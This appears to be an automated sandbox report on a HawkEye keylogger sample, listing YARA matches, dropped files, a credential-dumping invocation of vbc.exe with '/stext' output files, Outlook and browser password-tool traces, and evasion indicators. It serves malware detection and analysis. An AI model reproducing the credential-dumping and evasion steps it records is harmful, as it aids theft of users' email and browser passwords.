            Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000C.00000002.612974883.0000000007750000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.csBase64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', 'zfWNmoVCmw9cYxvRPzpOe7yARVOHExi6TsOCR63LGMs+Lv0nLSEyXoiEOPiEzRyN', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@7/5@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00411EF8 FindResourceW,SizeofResource,LoadResource,LockResource,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ypBoHI5G3x.exe.logJump to behavior
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeFile created: C:\Users\user\AppData\Local\Temp\InstallUtil.exeJump to behavior
            Source: ypBoHI5G3x.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.493947169.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: ypBoHI5G3x.exeVirustotal: Detection: 28%
            Source: ypBoHI5G3x.exeReversingLabs: Detection: 32%
            Source: unknownProcess created: C:\Users\user\Desktop\ypBoHI5G3x.exe 'C:\Users\user\Desktop\ypBoHI5G3x.exe'
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: ypBoHI5G3x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ypBoHI5G3x.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: ypBoHI5G3x.exeStatic file information: File size 1287680 > 1048576
            Source: ypBoHI5G3x.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x139c00
            Source: ypBoHI5G3x.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
            Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.613574939.0000000008110000.00000004.00000001.sdmp
            Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: ypBoHI5G3x.exe, 00000001.00000002.463314966.000000000768B000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599966159.00000000008B2000.00000002.00020000.sdmp, InstallUtil.exe.1.dr
            Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exe
            Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, vbc.exe
            Source: Binary string: InstallUtil.pdb source: ypBoHI5G3x.exe, 00000001.00000002.463314966.000000000768B000.00000004.00000001.sdmp, InstallUtil.exe, InstallUtil.exe.1.dr

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_00C3D0C9 push esi; retf
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_00C3CECD push eax; retf
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_00C3D779 push eax; retf
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_00C3CD10 push ecx; retf
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_00C3D417 push ecx; retf
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_00C3CD9C push esp; retf
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_05FF363A push ebx; retf
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_0516AC12 pushfd ; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00442871 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00442A90 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00442A90 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00446E54 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 19_2_00411879 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 19_2_004118A0 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 19_2_004118A0 push eax; ret
            Source: ypBoHI5G3x.exe, Ra1/Ms7.csHigh entropy of concatenated method names: '.ctor', 'b1T', 'x5B', 'm4G', 'w6N', 'Wb3', 'g8G', 'f6J', 'Rn4', 'Aa5'
            Source: ypBoHI5G3x.exe, Wf6/Zk3.csHigh entropy of concatenated method names: '.ctor', 'd6Z', 'w2G', 'j2L', 'k7K', 'At4', 'Mm8', 'Se6', 'Lg5', 'Qe9'
            Source: 1.2.ypBoHI5G3x.exe.c30000.0.unpack, Ra1/Ms7.csHigh entropy of concatenated method names: '.ctor', 'b1T', 'x5B', 'm4G', 'w6N', 'Wb3', 'g8G', 'f6J', 'Rn4', 'Aa5'
            Source: 1.2.ypBoHI5G3x.exe.c30000.0.unpack, Wf6/Zk3.csHigh entropy of concatenated method names: '.ctor', 'd6Z', 'w2G', 'j2L', 'k7K', 'At4', 'Mm8', 'Se6', 'Lg5', 'Qe9'
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeFile created: C:\Users\user\AppData\Local\Temp\InstallUtil.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Changes the view of files in windows explorer (hidden files and folders)Show sources
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeFile opened: C:\Users\user\Desktop\ypBoHI5G3x.exe\:Zone.Identifier read attributes | delete
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00441975 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 180000
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeWindow / User API: threadDelayed 399
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeWindow / User API: threadDelayed 9441
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe TID: 6688Thread sleep time: -15679732462653109s >= -30000s
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe TID: 6760Thread sleep count: 399 > 30
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe TID: 6760Thread sleep count: 9441 > 30
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe TID: 6688Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 6708Thread sleep time: -922337203685477s >= -30000s
